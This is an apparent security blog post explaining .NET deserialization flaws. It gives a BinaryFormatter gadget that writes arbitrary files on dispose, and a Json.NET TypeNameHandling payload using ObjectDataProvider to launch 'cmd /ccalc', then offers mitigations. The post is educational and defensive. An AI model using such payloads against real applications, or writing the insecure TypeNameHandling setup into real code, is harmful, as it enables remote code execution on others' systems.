SecurityAndStuff

Deserialization Vulnerabilities

 469  3 mins

C#

BinaryFormatter

BinaryFormatter is a class available in .NET to serialize an object, or a graph of them, into a binary format. We will create a class that will be serialized and then read back, and another class that won’t be serialized.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

// When this class is dispose, it will write Contents to disk
[Serializable]
class LogWriter : IDisposable
{
    private string _path = "C:/log.txt";

    public string Contents { get; set; }

    ~LogWriter()
    {
        Dispose();
    }

    public void Dispose()
    {
        File.WriteAllText(_path, Contents);
    }
}

// This could be any serializable class
[Serializable]
class SerializableClass
{
}

private static void Serialize()
{
    var fs = new FileStream("SerializableClass.dat", FileMode.Create);
    BinaryFormatter formatter = new BinaryFormatter();
    formatter.Serialize(fs, new SerializableClass());
}

private static void Deserialize()
{
    var fs = new FileStream("SerializableClass.dat", FileMode.Open);
    BinaryFormatter formatter = new BinaryFormatter();
    SerializableClass a = (SerializableClass)formatter.Deserialize(fs);
}

Notice how LogWriter writes the logs when it’s disposed. If we change the SerializableClass.dat to instead be a serialization of a modified version of LogWriter, we can write a file with the contents we want anywhere the program has write access to.

I’ll change the following:

private string _path = "C:/log2.txt";
public string Contents { get; set; } = "Hello"

I will then serialize the file as SerializableClass.dat. When the program runs it will try to deserialize the file, an exception will be thrown when trying to cast the object to SerializableClass. This will lead to the Dispose method being called, and thus we will write “Hello” into “C:/log2.txt”.

Json.NET

When using Json.NET, some ways of doing deserialization can lead to code execution. This is an issue if you use TypeNameHandling setting with a value other than None and try to deserialize JSON using either:

  • a dynamic type
  • an object type
  • the non generic version of DeserializeObject

Here’s some JSON that will open a calculator:

1
2
3
4
5
6
7
8
9

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/ccalc']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

We could run any application, and there are other ways to do it. In this case we used the ObjectDataProvider class.

1
2
3
4
5

JsonConvert.DefaultSettings = () =>
                new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Auto };
JsonConvert.DeserializeObject<object>(json);
//JsonConvert.DeserializeObject<dynamic>(json);
//JsonConvert.DeserializeObject(json);

This is not a security issue in Json.NET, but it shows how improper configuration can lead to code execution.

Conclusion

Deserialization attacks are a real risk if you deserialize untrusted data, and some forms of it such as BinaryFormatter are inherently unsafe. You can mitigate this by signing files, and for Json.NET, never using TypeNameHandling in the aforementioned ways.

updatedupdated2023-03-192023-03-19